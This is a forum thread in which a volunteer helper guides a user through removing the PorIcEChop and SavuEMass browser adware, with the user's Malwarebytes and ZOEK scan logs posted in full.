
Help! Infected with PorIcEChop & SavuEMass browser virus



I have Webroot and Malwarebytes, and so far I still have the PorIcEChop & SavuEMass virus in both Chrome and Firefox browsers. I have checked IE, but I don't see it there. I keep deleting PorIcEChop & SavuEMass; they keep popping up.

 

This virus keeps putting orange double underlines under certain key words for advertising.

 

Please advise.  Thank you.

 

- fryerlawrence

 

 

 

 


Hello,

They call me TwinHeadedEagle around here, and I'll be working with you.

Before we start please read and note the following:

  • Limit your internet access to posting here; some infections just wait to steal typed-in passwords.
  • Please be patient. I know it is frustrating when your PC isn't working properly, but malware removal takes time.
  • Don't run any scripts or tools on your own; unsupervised usage may cause more harm than good.
  • Do not paste the logs in your posts; attachments make my work easier. There is an Attach Files option below which you can use to attach your reports. Always attach reports from all tools.
  • Stay with me to the end; the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.
  • Do not ask for help for your business PC. Companies are making revenue via computers, so it is a good thing to pay someone to repair it.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.

  • I can't foresee everything, so if anything unexpected happens, please stop and inform me!
  • There are no silly questions. Never be afraid to ask if in doubt!

P2P/Piracy Warning:

  • If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.
  • Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now and read the policy on Piracy.

 

 

 

Scan with Malwarebytes' Anti-Malware

Please re-run Malwarebytes' Anti-Malware.

  • First of all, select update.
  • Once updated, click the Settings tab, in the left panel choose Detection & Protection and tick Scan for rootkits.
  • Click the Scan tab, make sure Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the newest Scan Log.
  • At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.


Malwarebytes Anti-Malware

www.malwarebytes.org

 

Scan Date: 7/29/2014

Scan Time: 8:21:20 AM

Logfile: 

Administrator: Yes

 

Version: 2.00.2.1012

Malware Database: v2014.07.29.03

Rootkit Database: v2014.07.17.01

License: Free

Malware Protection: Disabled

Malicious Website Protection: Disabled

Self-protection: Disabled

 

OS: Windows 8.1

CPU: x64

File System: NTFS

User: Owner

 

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 319149

Time Elapsed: 13 min, 34 sec

 

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Warn

PUM: Enabled

 

Processes: 0

(No malicious items detected)

 

Modules: 0

(No malicious items detected)

 

Registry Keys: 8

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{E2343056-CC08-46AC-B898-BFC7ACF4E755}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{9B41579A-1996-42F9-8F84-7B7786818CEF}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{9B41579A-1996-42F9-8F84-7B7786818CEF}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{E2343056-CC08-46AC-B898-BFC7ACF4E755}, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

 

Registry Values: 0

(No malicious items detected)

 

Registry Data: 0

(No malicious items detected)

 

Folders: 2

PUP.Optional.MultiPlug.A, C:\ProgramData\PorIcEChop, Quarantined, [4859079995e60e283cdacefb43bf42be], 

PUP.Optional.MultiPlug.A, C:\Program Files (x86)\PorIcEChop, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

 

Files: 3

PUP.Optional.MultiPlug.A, C:\ProgramData\PorIcEChop\Pdw4RkEwMhi.dat, Quarantined, [4859079995e60e283cdacefb43bf42be], 

PUP.Optional.MultiPlug.A, C:\Program Files (x86)\PorIcEChop\wXgGsxssG8.dat, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

PUP.Optional.MultiPlug.A, C:\Program Files (x86)\PorIcEChop\wXgGsxssG8.tlb, Quarantined, [267bd1cfafccd75fb95effcabb47e31d], 

 

Physical Sectors: 0

(No malicious items detected)

 

 

(end)


Okay, we're going to run one more tool:

 

 

Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (the preferred version is the *.exe one).

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on the ZOEK icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console appears; it may take a minute or two.
  • In the main box please paste in the following script:

    createsrpoint;gpt.ini;z C:\Windows\System32\GroupPolicy;vC:\Windows\SysWOW64\GroupPolicy;vprocess;services-list;systemspecs;startupall;skipfix-iedefaults;firefoxlook;chromelook;filesrcm;installedprogs;
  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, the log will open after the reboot. You may also find it on your main drive (usually the C:\ drive).

Post its content into your next reply.

Zoek.exe v5.0.0.0 Updated 28-07-2014

Tool run by Owner on Tue 07/29/2014 at 14:18:08.47.

Microsoft Windows 8.1 6.3.9600  x64

Running in: Normal Mode Internet Access Detected

Launched: C:\Users\Owner\Desktop\zoek.exe [scan all users] [script inserted] 

 

==== System Restore Info ======================

 

7/29/2014 2:19:13 PM Zoek.exe System Restore Point Created Succesfully.

 

==== Installed Programs ======================

 

7-Zip 9.20 (x64 edition)  

ABBYY FineReader 6.0 Sprint  

Adobe Flash Player 14 Plugin  

Adobe Reader XI (11.0.07)  

AI Suite II  

AMD Accelerated Video Transcoding  

AMD Catalyst Install Manager  

AMD VISION Engine Control Center  

ASUS Music Maker  

ASUS MX Suite  

ASUS Video easy  

ASUS WebStorage Sync Agent  

ASUSDVD  

AsusVibe2.0  

Audacity 2.0.5  

Bandicam  

Bandisoft MPEG-1 Decoder  

Burnout™ Paradise: The Ultimate Box

Catalyst Control Center - Branding  

Catalyst Control Center InstallProxy  

Catalyst Control Center Localization All  

ccc-utility64  

CCC Help Chinese Standard  

CCC Help Chinese Traditional  

CCC Help Czech  

CCC Help Danish  

CCC Help Dutch  

CCC Help English  

CCC Help Finnish  

CCC Help French  

CCC Help German  

CCC Help Greek  

CCC Help Hungarian  

CCC Help Italian  

CCC Help Japanese  

CCC Help Korean  

CCC Help Norwegian  

CCC Help Polish  

CCC Help Portuguese  

CCC Help Russian  

CCC Help Spanish  

CCC Help Swedish  

CCC Help Thai  

CCC Help Turkish  

CCleaner  

Classic Shell  

CPUID HWMonitor 1.25  

D3DX10  

Dead Space™

Dragon's Lair  

Dream Aquarium  

eManual  

eReg  

Firebird SQL Server - MAGIX Edition  

Galería de fotos

Galerie de photos  

Google Chrome  

Google Update Helper  

Java 7 Update 60  

Java Auto Updater  

LAME v3.99.3 (for Windows)  

LastPass (uninstall only)  

Lexmark Pro800-Pro900 Series  

Linksys Connect  

Logitech SetPoint 6.65  

Malwarebytes Anti-Malware version 2.0.2.1012  

MediaCoder x64 0.8.28.5588  

Microsoft Application Error Reporting  

Microsoft Flight  

Microsoft Games for Windows - LIVE Redistributable  

Microsoft Games for Windows Marketplace  

Microsoft Office 365 - en-us  

Microsoft Office Document Recrypt Tool  

Microsoft OneDrive  

Microsoft Silverlight  

Microsoft SQL Server 2005 Compact Edition [ENU]  

Microsoft Visual C++ 2005 Redistributable  

Microsoft Visual C++ 2005 Redistributable (x64)  

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319  

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319  

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106  

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106  

Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.51106  

Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.51106  

Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106  

Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106  

Microsoft Xbox 360 Accessories 1.2  

Movie Maker  

Mozilla Firefox 31.0 (x86 en-US)  

Mozilla Maintenance Service  

MSVCRT  

MSVCRT110  

MSVCRT110_amd64  

MSXML 4.0 SP3 Parser  

MSXML 4.0 SP3 Parser (KB2758694)  

Need for Speed Hot Pursuit  

Need for Speed™ Rivals

Need for Speed™ The Run

Need For Speed™ World

NETGEAR WNA3100 wireless USB 2.0 adapter  

Next Generation Visualisations  

NVIDIA 3D Vision Controller Driver 337.88  

NVIDIA 3D Vision Driver 337.88  

NVIDIA Control Panel 337.88  

NVIDIA GeForce Experience 2.1  

NVIDIA Graphics Driver 337.88  

NVIDIA HD Audio Driver 1.3.30.1  

NVIDIA Install Application  

NVIDIA LED Visualizer 1.0  

NVIDIA Network Service  

NVIDIA PhysX  

NVIDIA PhysX System Software 9.13.1220  

NVIDIA ShadowPlay 14.6.22  

NVIDIA Stereoscopic 3D Driver  

NVIDIA Update 14.6.22  

NVIDIA Update Core  

NVIDIA Virtual Audio 1.2.23  

OEM Application Profile  

Office 15 Click-to-Run Extensibility Component  

Office 15 Click-to-Run Licensing Component  

Office 15 Click-to-Run Localization Component  

Orbit Downloader  

Origin  

Peggle  

Photo Common  

Photo Gallery  

Plants vs. Zombies™

Ralink RT2860 Wireless LAN Card  

Realtek Ethernet Controller Driver  

Realtek High Definition Audio Driver  

Revo Uninstaller 1.95  

SAMSUNG USB Driver for Mobile Phones  

Secunia PSI (2.0.0.4003)  

Shared C Run-time for x64  

SHIELD Streaming  

Steam  

Tinker  

Webroot SecureAnywhere  

Why ASUS PC  

Windows Live  

Windows Live Communications Platform  

Windows Live Essentials  

Windows Live Installer  

Windows Live Photo Common  

Windows Live PIMT Platform  

Windows Live SOXE  

Windows Live SOXE Definitions  

Windows Live UX Platform  

Windows Live UX Platform Language Pack  

WinPcap 4.1.2  

Yahoo Messenger  

 

==== Running Processes ======================

 

C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe

C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe

C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe

C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe

C:\Program Files (x86)\Secunia\PSI\PSIA.exe

C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe

C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe

C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe

C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe

C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE

C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\lxecmon.exe

C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\ezprint.exe

C:\Program Files (x86)\InstallShield Installation Information\{E6931688-DA2B-4E16-8539-3D323D69C677}\AiChargerPlus.exe

C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

C:\Program Files (x86)\NETGEAR\WNA3100\WNA3100.exe

C:\Program Files (x86)\Secunia\PSI\psi_tray.exe

C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe

C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

C:\Users\Owner\Desktop\zoek.exe

C:\WINDOWS\SysWOW64\cmd.exe

C:\WINDOWS\SysWOW64\cmd.exe

C:\WINDOWS\SysWOW64\cmd.exe

 

==== Services (whitelist) ======================

Powered by E Dev

 

R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"

R2 - [asComSvc] - ASUS Com Service - C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe

R2 - [asHmComSvc] - ASUS HM Com Service - C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe

R2 - [AsSysCtrlService] - ASUS System Control Service - C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe

R2 - [Asus WebStorage Windows Service] - Asus WebStorage Windows Service - "C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe"

R2 - [ClickToRunSvc] - Microsoft Office ClickToRun Service - "C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" /service

R2 - [Fabs] - FABS - Helping agent for MAGIX media database - C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe /DisableUI

R2 - [lxecCATSCustConnectService] - lxecCATSCustConnectService - C:\WINDOWS\system32\spool\DRIVERS\x64\3\\lxecserv.exe

R2 - [NvNetworkService] - NVIDIA Network Service - "C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe"

R2 - [NvStreamSvc] - NVIDIA Streamer Service - "C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe"

R2 - [nvsvc] - NVIDIA Display Driver Service - "C:\WINDOWS\system32\nvvsvc.exe"

R2 - [secunia PSI Agent] - Secunia PSI Agent - "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service

R2 - [stereo Service] - NVIDIA Stereoscopic 3D Driver Service - "C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe"

R2 - [WSearch] - Windows Search - C:\WINDOWS\system32\SearchIndexer.exe /Embedding

R3 - [VSS] - Volume Shadow Copy - C:\WINDOWS\system32\vssvc.exe

S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

S2 - [sppsvc] - Software Protection - C:\WINDOWS\system32\sppsvc.exe

S2 - [WRSVC] - WRSVC - "C:\Program Files (x86)\Webroot\WRSA.exe" -service

S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

S3 - [ALG] - Application Layer Gateway Service - C:\WINDOWS\System32\alg.exe

S3 - [COMSysApp] - COM+ System Application - C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

S3 - [Fax] - Fax - C:\WINDOWS\system32\fxssvc.exe

S3 - [FirebirdServerMAGIXInstance] - Firebird Server - MAGIX Instance - "C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe"

S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc

S3 - [iEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\WINDOWS\system32\IEEtwCollector.exe /V

S3 - [LBTServ] - Logitech Bluetooth Service - C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe

S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

S3 - [MSDTC] - Distributed Transaction Coordinator - C:\WINDOWS\System32\msdtc.exe

S3 - [msiserver] - Windows Installer - C:\WINDOWS\system32\msiexec.exe /V

S3 - [ose] - Office  Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"

S3 - [PerfHost] - Performance Counter DLL Host - C:\WINDOWS\SysWow64\perfhost.exe

S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\WINDOWS\system32\locator.exe

S3 - [sNMPTRAP] - SNMP Trap - C:\WINDOWS\System32\snmptrap.exe

S3 - [steam Client Service] - Steam Client Service - "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService

S3 - [TrustedInstaller] - Windows Modules Installer - C:\WINDOWS\servicing\TrustedInstaller.exe

S3 - [vds] - Virtual Disk - C:\WINDOWS\System32\vds.exe

S3 - [wbengine] - Block Level Backup Engine Service - "C:\WINDOWS\system32\wbengine.exe"

S3 - [WdNisSvc] - Windows Defender Network Inspection Service - "C:\Program Files\Windows Defender\NisSrv.exe"

S3 - [WinDefend] - Windows Defender Service - "C:\Program Files\Windows Defender\MsMpEng.exe"

S3 - [wmiApSrv] - WMI Performance Adapter - C:\WINDOWS\system32\wbem\WmiApSrv.exe

S3 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"

 

==== Folders Found ======================

 

 

==== Files Found ======================

 

 

==== System Specs ======================

 

Windows: Windows Version 6.2 (Build 9200)

Memory (RAM): 8137 MB

CPU Info: AMD A10-6700 APU with Radeon HD Graphics

CPU Speed: 3770.3 MHz

Sound Card: Sharp LC-32LB150U-4 (NVIDIA Hig | 

Display Adapters: NVIDIA GeForce GTX 660   | NVIDIA GeForce GTX 660   | NVIDIA GeForce GTX 660   | NVIDIA GeForce GTX 660

Monitors: 1x; Generic PnP Monitor | 

Screen Resolution: 1768 X 992 - 32 bit

Network: Network Present

Network Adapters: Microsoft Wi-Fi Direct Virtual Adapter | 802.11n Wireless LAN Card

CD / DVD Drives: 1x (D: | ) D: ASUS DVDRAM GHB1N

Ports: COM Ports NOT Present. LPT Port NOT Present. 

Mouse: 16 Button Wheel Mouse Present

Hard Disks: C:  913.1GB

Hard Disks - Free: C:  717.5GB

Manufacturer *: ASUSTeK COMPUTER INC. (Licensed from AMI)

BIOS Info: AT/AT COMPATIBLE |  | ALASKA - 1072009

Time Zone: Mountain Standard Time

Motherboard *: ASUSTeK COMPUTER INC. M11BB

Country: United States 

Language: ENU 

 

==== System Specs (Software) ======================

 

Anti-Virus: Webroot SecureAnywhere On-access scanning disabled (Outdated)

Anti-Virus: Windows Defender On-access scanning disabled (Outdated)

Anti-Spyware: Webroot SecureAnywhere disabled (Outdated)

Anti-Spyware: Windows Defender disabled (Outdated)

Default Browser: Google Chrome 36.0.1985.125

Internet Explorer Version: 11.0.9600.17207 

Mozilla Firefox version: 31.0 (x86 en-US)

Google Chrome version: 36.0.1985.125

Adobe Reader version: 11.0.07.79

Sun Java version: 1.7.0_65 (32-bit) 

Flash Player version: 14.0.0.145

 

==== Files Recently Created / Modified ======================

 

====== C:\WINDOWS ====

====== C:\Users\Owner\AppData\Local\Temp ====

2014-07-29 04:54:12 E3A25C80E2375B2D42C3D4729769BDF3 10240 ----a-w- C:\Users\Owner\AppData\Local\Temp\SDIAG_200651e0-ed3f-4f1d-9edf-39d9db6431cb\NetworkDiagnosticSnapIn.dll

2014-07-28 23:26:25 E3A25C80E2375B2D42C3D4729769BDF3 10240 ----a-w- C:\Users\Owner\AppData\Local\Temp\SDIAG_a4be0d3d-46b0-43c1-8804-007772ce60b3\NetworkDiagnosticSnapIn.dll

2014-07-17 17:32:56 F0862AA1A4E5D2E7A1A935737E3F2C6B 291184 ----a-w- C:\Users\Owner\AppData\Local\Temp\lu\2_spp_200006d.exe

2014-07-17 17:32:54 04349DB1919EDEE3DF40909776FD25AC 437512 ----a-w- C:\Users\Owner\AppData\Local\Temp\lu\1_spp_10000a2.exe

2014-07-17 17:30:13 7413397B938C6578D064CD72BF4308A9 81533904 ----a-w- C:\Users\Owner\AppData\Local\Temp\lu\1_spp_setpointp.exe

====== Java Cache =====

2014-07-21 22:14:09 87C8A2FB22129807F7FFF9E105856401 252799 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\b2facd-66899239

2014-07-21 22:13:53 BAD9BB7A4BF694A68A7704E5A55DA5D4 43720 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\49fb225f-618ac822

2014-07-21 22:13:52 2D65E85EF7D762832423FFD1FBAFE842 325 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\757c73c4-d0d1141df312931ffeb507c773ed3d9ffb8b62143f502cc6af32543ba0bff958-6.0.lap

2014-07-09 17:47:55 338FF0BBCD96F62A21017FE78F474B4B 265357 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\7e60542d-1c279bb0

2014-07-09 17:47:53 0719A8334BEBACBFCA55555E98B66AB2 932 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\15572e2f-547ad759

2014-07-09 17:52:11 0719A8334BEBACBFCA55555E98B66AB2 932 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\31b19ba-5b4f7d29

2014-07-09 17:47:54 0719A8334BEBACBFCA55555E98B66AB2 932 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\2bbaaf87-1a3ffccb

2014-07-09 17:47:54 7A42F0F9912D6B17E0411E4380B4B472 106 ----a-w- C:\Users\Owner\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\2bbaaf87-e2e4c8970372d2fb4193a7ef29d16f6c3f08527947fcb9208b3a0e48820369fd-6.0.lap

====== C:\WINDOWS\SysWOW64 =====

====== C:\WINDOWS\SysWOW64\drivers =====

====== C:\WINDOWS\Sysnative =====

2014-07-27 07:06:28 BCCFB97B1B68DD18F2BDACFE37409386 716800 ----a-w- C:\WINDOWS\Sysnative\SkyDriveTelemetry.dll

2014-07-27 07:06:28 11FD8DDAB6014EECCE88F1F581604C30 1120256 ----a-w- C:\WINDOWS\Sysnative\SkyDrive.exe

2014-07-27 07:06:28 04142EC4BDD7F502922914F65A5EE1D1 4756992 ----a-w- C:\WINDOWS\Sysnative\SyncEngine.dll

====== C:\WINDOWS\Sysnative\drivers =====

2014-07-09 20:41:45 374E27295F0A9DCAA8FC96370F9BEEA5 563200 ----a-w- C:\WINDOWS\Sysnative\drivers\afd.sys

2014-07-09 20:41:41 1CD3A907D64D08F49208DA00B69BF35E 565576 ----a-w- C:\WINDOWS\Sysnative\drivers\cng.sys

2014-07-09 20:41:13 7A1A3F213CDB3363D179D5014272025D 402432 ----a-w- C:\WINDOWS\Sysnative\drivers\mrxsmb.sys

2014-07-09 20:41:12 674A4702E4E144E8710ED1A2EC6DD049 96768 ----a-w- C:\WINDOWS\Sysnative\drivers\agilevpn.sys

2014-07-09 20:41:12 65ED7B9CFEA893DF7748D5FF692690DE 38912 ----a-w- C:\WINDOWS\Sysnative\drivers\vwifimp.sys

2014-07-09 20:41:12 35BF5C5F5E3C9902C98978C7640574DA 71680 ----a-w- C:\WINDOWS\Sysnative\drivers\vwififlt.sys

2014-07-09 20:40:59 5C42CEE3E2018E1DFC6E3E17240A432A 206848 ----a-w- C:\WINDOWS\Sysnative\drivers\mrxsmb20.sys

2014-07-09 20:39:46 FE0ADF5028EB8C1339B66B3AEDE3FEF9 440664 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbport.sys

2014-07-09 20:39:46 D537815E450A149752C15868392AD1F3 110592 ----a-w- C:\WINDOWS\Sysnative\drivers\WUDFPf.sys

2014-07-09 20:39:46 93435654DCA210298BA0F986EB51C679 419672 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbhub.sys

2014-07-09 20:39:46 83C9C45D59C72FEFDAE9A5686BE31FEA 467800 -c--a-w- C:\WINDOWS\Sysnative\drivers\USBHUB3.SYS

2014-07-09 20:39:46 7CCBBCEE408A5DBE3FE47297DB5A6CFC 227840 ----a-w- C:\WINDOWS\Sysnative\drivers\WUDFRd.sys

2014-07-09 20:39:46 48BA326A3DBA5B5BEB5F2777F4618696 89944 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbehci.sys

2014-07-09 20:39:46 25AC0B50A71938890970E1508F107196 2518360 ----a-w- C:\WINDOWS\Sysnative\drivers\tcpip.sys

2014-07-09 20:39:46 064260B3A5868AC894A4943543BC7AB7 37376 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbuhci.sys

2014-07-09 20:39:45 D79920BE4E6683D3AB50F71457A4F6C6 27480 -c--a-w- C:\WINDOWS\Sysnative\drivers\usbd.sys

2014-07-09 20:38:40 8FCE57F7E5CDA5751FDE01A316180488 428888 ----a-w- C:\WINDOWS\Sysnative\drivers\FWPKCLNT.SYS

2014-07-05 20:00:46 8A50D5304E6AE48664CF5838EC32F647 122584 ----a-w- C:\WINDOWS\Sysnative\drivers\MBAMSwissArmy.sys

2014-07-05 20:00:31 9D9ED48F841EA37AA5310D54B9E5D3C7 91352 ----a-w- C:\WINDOWS\Sysnative\drivers\mbamchameleon.sys

2014-07-05 20:00:31 0664F6335F108F38FE08C3CA747311EE 64216 ----a-w- C:\WINDOWS\Sysnative\drivers\mwac.sys

====== C:\WINDOWS\Tasks ======

====== C:\WINDOWS\Temp ======

======= C:\Program Files =====

======= C:\PROGRA~2 =====

2014-07-21 21:01:35 -------- d-----w- C:\PROGRA~2\SavuEMass

2014-07-16 19:02:05 -------- d-----w- C:\PROGRA~2\COMMON~1\Java

2014-07-09 17:51:19 -------- d-----w- C:\PROGRA~2\Java

======= C: =====

====== C:\Users\Owner\AppData\Roaming ======

2014-07-21 21:01:47 -------- d-----w- C:\Users\Owner\AppData\Locallow\{26D46134-E7D9-B0E1-D3AC-35CE315423DC}

2014-07-21 21:01:36 -------- d-----w- C:\Users\Owner\AppData\Locallow\{C9EAD628-4A64-6AB3-116E-04E63EF48DFE}

2014-07-21 21:01:33 -------- d-----w- C:\Users\Owner\AppData\Local\Chromatic Browser

2014-07-21 21:01:33 -------- d-----w- C:\Users\Guest\AppData\Local\Chromatic Browser

2014-07-21 21:01:32 -------- d-----w- C:\Users\Owner\AppData\Local\Torch

2014-07-21 21:01:32 -------- d-----w- C:\Users\Guest\AppData\Local\Torch

2014-07-21 21:01:32 -------- d-----w- C:\Users\Administrator\AppData\Local\Torch

2014-07-21 21:01:32 -------- d-----w- C:\Users\Administrator\AppData\Local\Chromatic Browser

2014-07-21 21:01:31 -------- d-----w- C:\Users\Owner\AppData\Local\Comodo

2014-07-21 21:01:31 -------- d-----w- C:\Users\Guest\AppData\Local\Comodo

2014-07-21 21:01:31 -------- d-----w- C:\Users\Administrator\AppData\Local\Comodo

2014-07-21 21:01:29 -------- d-----w- C:\Users\Guest\AppData\Local\Google

2014-07-21 21:01:29 -------- d-----w- C:\Users\Administrator\AppData\Local\Google

2014-07-09 15:25:05 -------- d-----w- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome

2014-07-04 01:25:33 027030A68FCB9E2DFB70468822DC4E29 241 ----a-w- C:\Users\Owner\AppData\Roaming\MPUI.ini

====== C:\Users\Owner ======

2014-07-27 07:09:31 -------- d-----w- C:\WINDOWS\serviceprofiles\Localservice\winhttp

2014-07-21 21:01:55 -------- d-----w- C:\ProgramData\GreenBay App

2014-07-21 21:01:37 -------- d-----w- C:\ProgramData\SavuEMass

2014-07-21 21:01:37 -------- d-----w- C:\ProgramData\e646da9e30087882

2014-07-21 21:01:35 075B0DA82E23780FA2DD7F2EA0464FD4 258 --sha-r- C:\ProgramData\ntuser.pol

2014-07-21 21:01:29 -------- d-----w- C:\Users\Guest\AppData

2014-07-21 21:01:29 -------- d-----w- C:\Users\Administrator\AppData

2014-07-21 21:00:47 -------- d-----w- C:\ProgramData\InstallMate

2014-07-17 12:57:23 CC2037DD4492E96C0AED1783F5B0B2AE 895120 ----a-w- C:\Users\Owner\Downloads\ChromeSetup.exe

2014-07-16 19:02:02 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

 

====== C: exe-files ==

2014-07-29 16:23:28 57CC12F075C4825E18107FF94C499B42 30160144 ----a-w- C:\ProgramData\NVIDIA Corporation\NetService\b87f45da-55d3-44e2-a85f-06a00ee66cda\GeForce_Experience_Update_v2.1.1.0.exe

2014-07-29 16:23:27 135B3E6D46D4A9B5384BA1CC501C2525 339872 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005e18\streaming-assets-need_for_speed_hot_pursuit.18735651.exe

